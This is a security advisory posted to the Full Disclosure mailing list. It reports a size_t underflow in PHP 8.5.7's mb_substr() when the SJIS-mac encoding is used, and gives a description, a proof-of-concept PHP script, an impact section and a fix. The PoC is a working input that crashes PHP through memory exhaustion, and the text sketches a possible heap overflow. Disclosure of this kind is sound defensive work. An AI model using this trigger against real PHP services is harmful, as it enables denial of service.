From: Khashayar Fereidani <info () fereidani com>
Date: Fri, 19 Jun 2026 09:53:43 +0330
# PHP 8.5.7 `mb_substr()` 'SJIS-mac' size_t underflow
**Author:** Khashayar Fereidani
**Disclosure Date:** 2026-06-18
**Advisory:** https://fereidani.com/php-857-mbsubstr-sjis-mac-sizet-underflow
**Contact:** https://fereidani.com/contact
## Description
The `mb_get_substr()` function in `ext/mbstring/mbstring.c`
deliberately skips an early empty return guard for the `SJIS-mac`
encoding when `from >= in_len`. As a result, it falls through to
`mb_get_substr_slow()`, executing `mb_convert_buf_init(&buf, MIN(len,
in_len - from), ...);`. When `from > in_len`, the parameter `in_len -
from` underflows the `size_t` representation, resulting in a vastly
large allocation size (near ~2^64 bytes). This leads to an immediate
Out-Of-Memory (OOM) fatal error. Furthermore, if
`_ZSTR_STRUCT_SIZE(initsize)` wraps past `SIZE_MAX`, it could
potentially allocate a tiny buffer while the structural limit retains
the pseudo-wild value, resulting in a heap buffer overflow when
subsequent codepoints are decoded and written.
## Proof of concept
```php
<?php
/*
* PoC: mb_substr() 'SJIS-mac' size_t underflow
* File: ext/mbstring/mbstring.c mb_get_substr() (~L2129) +
mb_get_substr_slow() (~L2102) *
* mb_get_substr() deliberately skips the early "return empty" guard
for SJIS-mac:
*
* if (len == 0 || (from >= in_len && enc != &mbfl_encoding_sjis_mac)) {
* return zend_empty_string; // <-- sjis_mac bypasses this
when from >= in_len
* }
*
* ... then falls through (sjis_mac is multibyte, not SBCS/WCS2/WCS4) to
* mb_get_substr_slow(), whose first line is:
*
* mb_convert_buf_init(&buf, MIN(len, in_len - from), ...);
*
* With `from > in_len` (bytes), `in_len - from` UNDERFLOWS size_t to ~2^64.
* mb_convert_buf_init does emalloc(_ZSTR_STRUCT_SIZE(initsize)).
*
* Two outcomes, both wrong (correct result is the empty string):
* (A) `from` huge -> initsize ~2^64 -> fatal "Allowed memory size exhausted
* (tried to allocate 18446744073708551644 bytes)". CONFIRMED below.
* (B) `from` only slightly > in_len -> initsize sits just under 2^64 and
* _ZSTR_STRUCT_SIZE(initsize) WRAPS past SIZE_MAX to a tiny allocation,
* while buf->limit = out + initsize stays wild -> a subsequent write of
* decoded codepoints is a HEAP OVERFLOW. (Harder to trigger reliably:
* needs a SJIS-mac input decoding to more codepoints than bytes, i.e.
* from < codepoint_count while from > byte_count. Worth upstream review.)
*/
echo "PHP ", PHP_VERSION, " sjis_mac available: ",
(in_array("SJIS-mac", mb_list_encodings()) ? "yes" : "no"), "\n\n";
/* control: a normal encoding with from > strlen returns "" cleanly */
echo "UTF-8, from=10 > strlen('abc'): -> "; var_dump(@mb_substr("abc",
10, null, "UTF-8"));
/* The bug: SJIS-mac, from >> strlen, length omitted -> underflow -> OOM fatal.
* The "tried to allocate 18...644 bytes" is literally (size_t)(3 - 1000000). */
echo "SJIS-mac, from=1000000 > strlen('abc'):\n";
@mb_substr("abc", 1000000, null, "SJIS-mac");
echo "(if you see this line, the fatal error above was caught/suppressed)\n";
```
## Impact
An attacker could intentionally furnish conditions where `from >
in_len` alongside the 'SJIS-mac' encoding, triggering a `size_t`
underflow. This predictably causes a severe Out-Of-Memory (OOM) fatal
error, culminating in a Denial of Service. Depending on environmental
details, it might hypothetically cause a heap buffer overflow.
## Solution
Adjust the constraints inside `mb_get_substr()` and
`mb_get_substr_slow()` in `ext/mbstring/mbstring.c`. The calculation
`in_len - from` should be adequately bounds-checked to halt
computation or safely cap at zero when `from > in_len`, sidestepping
the underflow when initializing string buffers.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- PHP 8.5.7 `mb_substr()` 'SJIS-mac' size_t underflow Khashayar Fereidani (Jun 20)